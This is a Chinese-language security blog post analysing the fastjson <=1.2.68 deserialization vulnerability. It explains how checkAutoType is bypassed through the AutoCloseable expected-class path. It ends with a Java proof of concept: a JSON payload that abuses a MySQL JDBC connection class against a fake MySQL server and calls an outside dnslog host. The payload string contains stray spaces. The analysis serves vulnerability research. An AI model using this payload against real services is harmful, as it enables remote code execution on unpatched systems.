fastjson<=1.2.68 漏洞分析

本文已超过 817天没有更新。如果文章内容或图片资源失效，请留言反馈，我会及时处理，谢谢！

去年写的文章，没发出来，给公众号增加点内容，也留点笔记

写在前面

自2017年3月15日 fastjson 1.2.24版本被爆出反序列化漏洞以来，其就成为了安全人员中的重点研究对象，即使后来 fastjson 为了安全设置了checkAutoType 防御机制，也依旧没能完全杜绝新的漏洞产生，结合今日BlackHat 大会上玄武实验室的《How i use json deserialization》议题，来看看这个漏洞。

Fastjson的两个机制

fastjson中产生漏洞的根本原因在于其 autoType 机制，以及针对于 autoType 机制做的 checkAutoType 检测防御机制，先来具体看看这两个机制。

Autotype

首先来谈谈为什么要有autotype这个机制

功能来源于需求，这是在开发过程中的准则之一，没有人会去做一个没有需求的功能，在fastjson中亦是如此。

当我们使用fastjson中的JSON.parseObject(jsonstr, xxx.class)方法的时候，如果xxx是一个抽象类或接口，那么我们得到的结果会是NULL，也就是说我们没有办法去指定一个抽象类或接口，只能根据json字符串中的实现类的信息去帮助开发者解析成对应的实现类。问题出现，那么需求就来了，如何实现fasjton对多态的支持?是的，fastjson给了我们答案——autotype 机制。

在fastjson中，当要将具体的实现类解析为json字符串的同时，开发者可以为其指定 SerializerFeature，然后通过添加 SerializerFeature.WriteClassName 的方式，使得在生成的 json字符串中，添加序列化信息(写入类型信息)。

举个例子:

如果现在有一个抽象类为 abstractClass_A，有一个实现类为class_B，当开发者要将class_B要解析成为json字符串的时候，就可以添加 SerializerFeature，如下所示:

可以看到，此时解析成功的json字符串内容如下：

{ "@type":"testAutoType$class_B", "str":"panda"}

会自动携带一个 @type 的属性，这个属性指定了序列化的类

之后当开发者想要直接使用抽象类A，就可以通过反序列化解析字符串，从而得到具体的实现类

checkAutoType

checkAutoType是 FastJson 在 1.2.25 以及之后的版本中，为了防止 autoType 这一机制带来的安全隐患，增加的检测防御机制，这是一个对于 @type 属性进行白名单+黑名单的限制机制

早期版本的checkAutoType存在一些比较低级的绕过方法，如加上L开头;结尾、双写LL绕过等，直到1.2.48版本后，checkAutoType 变得成熟，黑名单也逐渐完善

其具体逻辑，可以用《How i use json deserialization》议题的一张图片概括:

checkAutoType首先会对传入的typeName进行3项检测:

是否是白名单中的类
是否在反序列化cache中(在mappings列表)
类有JSONType注解(如:fastjson.annotation.JSONType)

如果满足以上条件，那么会直接return出去继续执行反序列化流程并且将未载入cache的类载入cache

如果没有满足其中的一个条件，那么会进入另一个判断:

传入的typeName是否在黑名单中
是否继承自RowSet、DataSource、ClassLoader等类

如果满足上述条件之一，那么直接抛出错误如果都不满足，那么会进行如下判断:

expectClass不为NULL、Object、Serializable、Closeable等类型
传入的typeName类继承于expctClass

如果满足以上条件，那么会直接return出去继续执行反序列化流程并且将未载入cache的类载入cache

如果不满足，那么会经过autoTypeSupport的判断，autoTypeSupport主要用来打开autotype功能，默认情况下是false，抛出错误，如果设置的是True那么会return出去继续执行反序列化流程并且将未载入cache的类载入cache

漏洞分析

实际上经过上面的分析，我们直到如果想要通过checkAutoType的检验，有以下几种方法:

传入的类在白名单中
开启了autotype(autoTypeSupport is true)
使用了JSONType注解(如:fastjson.annotation.JSONType)
某些期望类 (继承于expectClass)
要反序列化的类在cache中 (TypeUtils.mappings列表中有 @type 指定的类)

对于第一、第二个方式我们可以不用考虑，因为白名单的类一般都是安全类、autotype默认是false，第三个也不用考虑，这个是开发者才可以用于指定的，因此如果想要绕过 checkAutoType 机制，只有以下两条路可以走:

要反序列化的类在cache中 (TypeUtils.mappings列表中有 @type 指定的类)
某些期望类 (继承于expectClass)

首先来看看第一条路

fastjson的cache，也就是TypeUtils.mappings列表，实际上在 fastjson.util.TypeUtils#addBaseClassMappings() 中被初始化

可以看到，其会将一些基本类型的类预加载到TypeUtils.mappings列表，并且这些在 TypeUtils.mappings列表中的基础类都有着自己的反序列化器(Deserializer):

所以除非能够通过某种方式将cache加入到mapping中，否则这种方式是没有办法利用的，而 “通过某种方式将cache加入到mapping中”实际上已经出现过利用方式类——在1.2.47版本中由于cache值默认为ture导致绕过了checkAutoType的检测

那么这条路实际上很难实现(不说断绝的原因是或许有未知的一些机制或方法能够将目标类加载到cache mapping中)

所以，来看看第二条路

checkAutoType(String typeName, Class<?> expectClass, int features)

所谓的期望类(expectClass)指的就是符合checkAutoType中的第二个参数的类

那么有哪些类继承类期望类呢?上文中也提到了，必须要满足:

if (expectClass == null) {     
  expectClassFlag = false;
} else if (expectClass != Object.class && expectClass != Serializable.class && expectClass != Cloneable.class && expectClass != Closeable.class && expectClass != EventListener.class  && expectClass != Iterable.class && expectClass != Collection.class) {
  expectClassFlag = true;
}else{  
  expectClassFlag = false;
}

此外，继承的期望类还不能在黑名单里

首先来看看期望类有哪些:

https://github.com/alibaba/fastjson/blob/3b370ac07cef990eb0a

10eeeb6388b2b91feada8/src/main/java/com/alibaba/fastjson/util/TypeUtils.java

然后看看fastjson的黑名单

https://github.com/LeadroyaL/fastjson-blacklist

在fastjson 1.2.68及以前的黑名单里，虽然包括了大部分常用的父接口和父类，但唯独少了 java.lang.AutoCloseabl和java.util.BitSet

所以就有了以下流程:

所以实际上找到一个typeName满足以下条件就可以绕过checkAutoType的检测:

继承于java.lang.AutoCloseabl或java.util.BitSet
不在fastjson的黑名单类中
其父类和父类接口不在黑名单中

最后一个限制导致我们不能直接利用fastjson去实现RCE的目的，因为我们常常用来搭载命令执行的类通常继承于ClassLoader、DataSource、RowSet 类，这些类都在黑名单中

所以我们找的typeName又多了新的条件:

能够导致RCE、SSRF或者文件读写的类

《How i use json deserialization》议题中给出了一些方向: 继承于 java.lang.AutoCloseable 的类能够导致的漏洞:

Mysql RCE
Apache commons io read and write files
Jetty SSRF
Apachexbean-reflectRCE
......

议题里作者还给了一些payload和具体的链，这里的漏洞复现我们以 Mysql RCE为例

漏洞复现

首先打开faker mysql

然后运行以下代码:

import com.alibaba.fastjson.JSON;
public class poc {
    public static void main(String[] args) {
        String serializedStr = "{\"@type\":\"java.lang.AutoCloseable\", \"@type\":\"com.mysql.jdbc.JDBC4Connection\",\"hostToConnectTo\":\"127.0.0.1\",\"portToConnectTo\":3306,\"ur l\":\"jdbc:mysql://127.0.0.1:3306/test? autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"databaseT oConnectTo\":\"test\",\"info\": {\"@type\":\"java.util.Properties\",\"PORT\":\"3306\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.Serve rStatusDiffInterceptor\",\"autoDeserialize\":\"true\",\"user\":\"yso_URLDNS_http://apwaty.dnslog.cn\",\"PORT.1\":\ "3306\",\"HOST.1\":\"127.0.0.1\",\"NUM_HOSTS\":\"1\",\"HOST\":\"127.0.0.1\",\"DBNAME\":\"test\"}}";
        Object obj1 = JSON.parse(serializedStr);
    }
}

即可完成反序列化攻击: